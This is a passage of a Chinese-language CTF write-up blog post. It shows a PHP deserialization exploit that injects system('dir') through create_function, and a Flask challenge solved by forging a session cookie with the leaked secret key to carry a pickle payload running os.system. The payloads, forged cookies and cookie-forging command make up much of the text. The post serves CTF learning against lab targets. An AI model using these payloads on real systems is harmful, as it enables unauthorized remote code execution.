find_string_with_md5_prefix(prefix)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;Found string: <span class="subst">&#123;result_string&#125;</span>&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;MD5 Hash: <span class="subst">&#123;md5_value&#125;</span>&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>很快就找到了一个可以用的:<code>519651</code>。接下来就是利用<code>$action(&#39;&#39;, $arg);</code>，这里后面看了网上类似的WP发现是要用<code>create_function</code>，但是因为有<code>preg_match(&#39;/^[a-z0-9_]*$|\n/isD&#39;, $action)</code>的限制，所以直接create_function过不掉。</p>
<p>这里查阅资料，可以用<code>\</code>来绕过。 让<code>$action=\create_function</code>，就会变成<code> function lamba()&#123;$arg&#125;</code>，这种形式，我们就让<code>$arg=return;&#125;system(&#39;dir&#39;);//</code>来进行拼接。</p>
<p>生成序列化字符串的代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">safe</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$password</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;password = <span class="keyword">new</span> <span class="title function_ invoke__">unsafe</span>();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">unsafe</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$username</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;username = <span class="number">519651</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span>=<span class="keyword">new</span> <span class="title function_ invoke__">safe</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"><span class="comment">//运行得到:O:4:&quot;safe&quot;:1:&#123;s:8:&quot;password&quot;;O:6:&quot;unsafe&quot;:1:&#123;s:8:&quot;username&quot;;i:519651;&#125;&#125;</span></span><br></pre></td></tr></table></figure>

<p>最终的<code>poc</code>:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/Collect/index.php?action=\create_function&amp;arg=return;&#125;system(&quot;dir&quot;);//</span><br><span class="line">post传：</span><br><span class="line">      unsafe=O:4:&quot;safe&quot;:1:&#123;s:8:&quot;password&quot;;O:6:&quot;unsafe&quot;:1:&#123;s:8:&quot;username&quot;;i:519651;&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>注意：这里的create_function比较特殊，可以用参数来进行闭合和拼接。其他不行。</p>
<h1 id="easy-flask"><a href="#easy-flask" class="headerlink" title="easy flask"></a>easy flask</h1><h2 id="题解-2"><a href="#题解-2" class="headerlink" title="题解"></a>题解</h2><p><del>听说是python的pickle反序列化。待填坑。</del>这个题目考察的flask的session伪造+pickle反序列化RCE</p>
<p>给了源码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template, redirect, url_for, session, send_from_directory</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = <span class="string">&#x27;s3cr3t_Key_Y0u_Nev3r_GuesS&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 用户数据存储目录</span></span><br><span class="line">USERS_DIR = <span class="string">&quot;users&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 创建用户数据存储目录</span></span><br><span class="line"><span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(USERS_DIR):</span><br><span class="line">    os.makedirs(USERS_DIR)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 注册路由</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/reg&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">register</span>():</span><br><span class="line">    username = request.form.get(<span class="string">&#x27;username&#x27;</span>)</span><br><span class="line">    password = request.form.get(<span class="string">&#x27;password&#x27;</span>)</span><br><span class="line">    user_data = &#123;</span><br><span class="line">        <span class="string">&#x27;username&#x27;</span>: username,</span><br><span class="line">        <span class="string">&#x27;password&#x27;</span>: password,</span><br><span class="line">    &#125;</span><br><span class="line">    user_file = os.path.join(USERS_DIR, base64.b64encode(username.encode(<span class="string">&#x27;utf-8&#x27;</span>)).decode(<span class="string">&#x27;utf-8&#x27;</span>) + <span class="string">&#x27;.data&#x27;</span>)</span><br><span class="line">    <span class="built_in">print</span>(user_data)</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(user_file, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">        pickle.dump(user_data, file)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;Registration successful&quot;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 注册页面</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/register&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">register_page</span>():</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;register.html&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 登录路由</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/login&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login</span>():</span><br><span class="line">    username = request.form.get(<span class="string">&#x27;username&#x27;</span>)</span><br><span class="line">    password = request.form.get(<span class="string">&#x27;password&#x27;</span>)</span><br><span class="line">    user_file = os.path.join(USERS_DIR, base64.b64encode(username.encode(<span class="string">&#x27;utf-8&#x27;</span>)).decode(<span class="string">&#x27;utf-8&#x27;</span>) + <span class="string">&#x27;.data&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> os.path.exists(user_file):</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(user_file, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">            stored_data = pickle.load(file)</span><br><span class="line">            <span class="keyword">if</span> password == stored_data[<span class="string">&#x27;password&#x27;</span>]:</span><br><span class="line">                <span class="comment"># 登录成功</span></span><br><span class="line">                session[<span class="string">&#x27;data&#x27;</span>] = base64.b64encode(pickle.dumps(stored_data)).decode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">                <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;index&#x27;</span>))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;Login failed&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 首页路由</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/index&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    data = session.get(<span class="string">&#x27;data&#x27;</span>, <span class="literal">None</span>)</span><br><span class="line">    <span class="keyword">if</span> data:</span><br><span class="line">        data = base64.b64decode(data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">b&#x27;R&#x27;</span> <span class="keyword">in</span> data <span class="keyword">or</span> <span class="string">b&#x27;built&#x27;</span> <span class="keyword">in</span> data <span class="keyword">or</span> <span class="string">b&#x27;setstate&#x27;</span> <span class="keyword">in</span> data:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&quot;hacker???&quot;</span></span><br><span class="line">        user_data = pickle.loads(data)</span><br><span class="line">        username = user_data[<span class="string">&#x27;username&#x27;</span>]</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>, username=username)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;login_page&#x27;</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 登录页面</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login_page</span>():</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;login.html&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 登出路由</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/logout&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">logout</span>():</span><br><span class="line">    session.pop(<span class="string">&#x27;data&#x27;</span>, <span class="literal">None</span>)  <span class="comment"># 清除 session 数据</span></span><br><span class="line">    <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;login_page&#x27;</span>))</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/cache&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">download_cache_file</span>():</span><br><span class="line">    <span class="comment"># 文件路径，根据你的项目结构可能需要调整</span></span><br><span class="line">    cache_file_path = os.path.join(<span class="string">&#x27;__pycache__&#x27;</span>, <span class="string">&#x27;app.cpython-38.pyc&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 检查文件是否存在</span></span><br><span class="line">    <span class="keyword">if</span> os.path.exists(cache_file_path):</span><br><span class="line">        <span class="keyword">return</span> send_from_directory(os.path.dirname(cache_file_path), os.path.basename(cache_file_path),</span><br><span class="line">                                   as_attachment=<span class="literal">True</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Cache file not found&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>代码量不大，可以看下逻辑，首先是注册路由那里：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/reg&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">register</span>():</span><br><span class="line">    username = request.form.get(<span class="string">&#x27;username&#x27;</span>)</span><br><span class="line">    password = request.form.get(<span class="string">&#x27;password&#x27;</span>)</span><br><span class="line">    user_data = &#123;</span><br><span class="line">        <span class="string">&#x27;username&#x27;</span>: username,</span><br><span class="line">        <span class="string">&#x27;password&#x27;</span>: password,</span><br><span class="line">    &#125;</span><br><span class="line">    user_file = os.path.join(USERS_DIR, base64.b64encode(username.encode(<span class="string">&#x27;utf-8&#x27;</span>)).decode(<span class="string">&#x27;utf-8&#x27;</span>) + <span class="string">&#x27;.data&#x27;</span>)</span><br><span class="line">    <span class="built_in">print</span>(user_data)</span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(user_file, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">        pickle.dump(user_data, file)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;Registration successful&quot;</span></span><br></pre></td></tr></table></figure>

<p>获取表单username和password的值，然后以json的格式做序列化操作，把序列化之后的内容，以base64编码的username，加上后缀.data进行命名，放到users文件夹下。比如这里我在注册页面输入username&#x3D;1,password&#x3D;1。就会在&#x2F;users下生成一个MQ&#x3D;&#x3D;.data文件。内容就是user_data序列化之后的。</p>
<p>然后再去看登录路由：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 登录路由</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/login&#x27;</span>, methods=[<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login</span>():</span><br><span class="line">    username = request.form.get(<span class="string">&#x27;username&#x27;</span>)</span><br><span class="line">    password = request.form.get(<span class="string">&#x27;password&#x27;</span>)</span><br><span class="line">    user_file = os.path.join(USERS_DIR, base64.b64encode(username.encode(<span class="string">&#x27;utf-8&#x27;</span>)).decode(<span class="string">&#x27;utf-8&#x27;</span>) + <span class="string">&#x27;.data&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> os.path.exists(user_file):</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(user_file, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">            stored_data = pickle.load(file)</span><br><span class="line">            <span class="keyword">if</span> password == stored_data[<span class="string">&#x27;password&#x27;</span>]:</span><br><span class="line">                <span class="comment"># 登录成功</span></span><br><span class="line">                session[<span class="string">&#x27;data&#x27;</span>] = base64.b64encode(pickle.dumps(stored_data)).decode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">                <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;index&#x27;</span>))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;Login failed&quot;</span></span><br></pre></td></tr></table></figure>

<p>同样的，也是先获取表单username和password的值，然后这里会把password的值和<code>MQ==.data</code>反序列化之后password字段的值做比较，如果相等，则登录成功，并且有个赋值操作:<code> session[&#39;data&#39;] = base64.b64encode(pickle.dumps(stored_data)).decode(&#39;utf-8&#39;)</code>，这里就是把stored_data的内容进行序列化然后再base64加密一下，这里stored_data的内容就是前面注册那里的user_data的内容。这里很重要，是我们后面去伪造session数据进行反序列化RCE的关键。</p>
<p>最后再看漏洞的触发点，也就是首页路由：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 首页路由</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/index&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    data = session.get(<span class="string">&#x27;data&#x27;</span>, <span class="literal">None</span>)</span><br><span class="line">    <span class="keyword">if</span> data:</span><br><span class="line">        data = base64.b64decode(data)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">b&#x27;R&#x27;</span> <span class="keyword">in</span> data <span class="keyword">or</span> <span class="string">b&#x27;built&#x27;</span> <span class="keyword">in</span> data <span class="keyword">or</span> <span class="string">b&#x27;setstate&#x27;</span> <span class="keyword">in</span> data:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&quot;hacker???&quot;</span></span><br><span class="line">        user_data = pickle.loads(data)</span><br><span class="line">        username = user_data[<span class="string">&#x27;username&#x27;</span>]</span><br><span class="line">        <span class="keyword">return</span> render_template(<span class="string">&#x27;index.html&#x27;</span>, username=username)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;login_page&#x27;</span>))</span><br></pre></td></tr></table></figure>

<p>这里我一开始看了哈工大一个同学写的文章，它上面提到的手法，这里都给过滤了，以为就不能RCE了，后面去找了些其他的文章，发现<code>i,O,S</code>也是可以RCE的，比如这里的<code>payload=b&#39;&#39;&#39;(S&#39;ls&#39;\nios\nsystem\n.&#39;&#39;&#39;</code>，我本地也尝试了一下，发现是可行的：</p>
<p><img src="https://img.picgo.net/2025/01/18/easy_flask1a7f7ce2eaeafc84c.png" alt="easy flask1"></p>
<p>可以看到成功执行了<code>ls</code>命令。所以只要这里的data可控，我们就可以通过<code>pickle.loads(data)</code>来RCE了。那么data是不是可控的呢？答案是的。</p>
<p>这里的<code>data = session.get(&#39;data&#39;, None)</code>，即<code>data=session[data]</code>，然后这里也给了<code>app.secret_key = &#39;s3cr3t_Key_Y0u_Nev3r_GuesS&#39;</code>，flask的session是存在本地的，我们可以看到：</p>
<p><img src="https://img.picgo.net/2025/01/18/easy_flask25fe3663165ac32af.png" alt="easy flask2"></p>
<p>比如我本地测试的session数据为:<code>eyJkYXRhIjoiZ0FTVklRQUFBQUFBQUFCOWxDaU1DSFZ6WlhKdVlXMWxsSXdCTVpTTUNIQmhjM04zYjNKa2xHZ0NkUzQ9In0.Z4tS0Q.X3jNUkjSknYN_3-2t8ubhmkOMdc</code>，一开始不知道这样的一个生成格式，但是稍微做了一个尝试，就可以猜到了，这里可以base64解码一下：</p>
<p><img src="https://img.picgo.net/2025/01/18/easy_flask3d014902b60d94f42.png" alt="easy flask3"></p>
<p>其实可以看出，前半部分<code>eyJkYXRhIjoiZ0FTVklRQUFBQUFBQUFCOWxDaU1DSFZ6WlhKdVlXMWxsSXdCTVpTTUNIQmhjM04zYjNKa2xHZ0NkUzQ9In0</code>,对应的就是{“data”:”base64加密”}的这样的数据形式，<code>.</code>之后的数据就是附带上的签名啥的。</p>
<p>所以我们可以有两种方式来构造<code>session</code>，把原来的app.py代码copy部分过来，本地再起一个<code>app.py</code>:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template, redirect, url_for, session, send_from_directory</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = <span class="string">&#x27;s3cr3t_Key_Y0u_Nev3r_GuesS&#x27;</span></span><br><span class="line">app.debug = <span class="literal">True</span></span><br><span class="line">app.config[<span class="string">&#x27;DEBUG&#x27;</span>] = <span class="literal">True</span></span><br><span class="line"><span class="comment"># 用户数据存储目录</span></span><br><span class="line">USERS_DIR = <span class="string">&quot;users&quot;</span></span><br><span class="line"><span class="comment"># 登录路由</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/payload&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login</span>():</span><br><span class="line">    session[<span class="string">&#x27;data&#x27;</span>] = base64.b64encode(<span class="string">b&#x27;&#x27;&#x27;(S&#x27;calc&#x27;\nios\nsystem\n.&#x27;&#x27;&#x27;</span>).decode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;Registration successful&quot;</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,debug=<span class="literal">True</span>,port=<span class="number">5005</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>把这里的session[‘data’]数据改写成我们的payload，<code> session[&#39;data&#39;] = base64.b64encode(b&#39;&#39;&#39;(S&#39;calc&#39;\nios\nsystem\n.&#39;&#39;&#39;).decode(&#39;utf-8&#39;)</code>。然后访问：</p>
<p><img src="https://img.picgo.net/2025/01/18/easy_flask4a1f9b8219cbf2755.png" alt="easy flask4"></p>
<p>我们把生成的cookie<code>eyJkYXRhIjoiS0ZNblkyRnNZeWNLYVc5ekNuTjVjM1JsYlFvdSJ9.Z4tVuA.aCbLwOZ2qdStMMgDsbAIVuGXbTk</code>直接做替换，放到我们原来的环境去打：</p>
<p>注意，这里是get请求，发送过去即可：</p>
<p><img src="https://img.picgo.net/2025/01/18/easy_flask5123c93dfabfe6d94.png" alt="easy flask5"></p>
<p>第二种方式就是建立在你有伪造脚本的情况：</p>
<p><img src="https://img.picgo.net/2025/01/18/easy_flask6eaf1ae6782fbb7d0.png" alt="easy flask6"></p>
<p>把生成的<code>session[data]</code>放到脚本上面去伪造，生成session:</p>
<p><code>python3 flask_session_cookie_manager3.py encode -s &quot;s3cr3t_Key_Y0u_Nev3r_GuesS&quot; -t &#39;&#123;&quot;data&quot;:&quot;KFMnY2FsYycKaW9zCnN5c3RlbQou&quot;&#125;&#39;</code></p>
<p><img src="https://img.picgo.net/2025/01/18/easy_flask767dff30e4baa462c.png" alt="easy flask7"></p>
<p>生成的<code>eyJkYXRhIjoiS0ZNblkyRnNZeWNLYVc5ekNuTjVjM1JsYlFvdSJ9.Z4taTQ.QENfsCMsjjyCXgB0b4Jx0waJL0g</code>丢到cookie里面发包也可以RCE:</p>
<p><img src="https://img.picgo.net/2025/01/18/easy_flask8451b955959e7c9f2.png" alt="easy flask8"></p>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>该花一段时间去好好整理一下python相关的漏洞了。</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/12/28/CTFshow-nodejs/" rel="prev" title="CTFshow nodejs">
                  <i class="fa fa-angle-left"></i> CTFshow nodejs
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/04/14/ctfshow%E5%A4%A7%E8%B5%9B%E5%8E%9F%E9%A2%98/" rel="next" title="ctfshow大赛原题">
                  ctfshow大赛原题 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">My0n9s</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
